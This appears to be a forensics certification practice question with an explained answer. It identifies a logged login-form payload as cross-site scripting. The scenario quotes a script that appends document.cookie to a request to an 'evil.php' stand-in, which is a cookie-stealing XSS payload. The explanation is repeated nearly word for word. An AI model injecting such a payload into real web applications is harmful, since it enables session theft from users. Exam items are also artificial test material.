You are the incident response manager at a regional bank. While performing routine auditing of web application logs, you find several attempted login submissions that contain the following strings:
< SCRIPT type="text/javascript" >
var adr = '../evil.php?cakemonster=' + escape(document.cookie);
< /SCRIPT >
What kind of attack has occurred?
The strings provided in the login submissions suggest an attempt to execute a script that captures cookies and sends them to an external PHP script. This behavior is characteristic of a Cross-site scripting (XSS) attack. XSS attacks inject malicious scripts into trusted websites to steal sensitive information, such as cookies. Therefore, the correct answer is Cross-site scripting.
The strings provided in the login submissions suggest an attempt to execute a script that captures cookies and sends them to an external PHP script. This behavior is characteristic of a Cross-site scripting (XSS) attack. Therefore, the correct answer is: A. Cross-site scripting This aligns with the information in the CHFI v10 textbook, which describes XSS attacks as those that inject malicious scripts into otherwise benign and trusted websites, often to steal cookies or other sensitive information.
A < https://owasp.org/www-community/attacks/xss/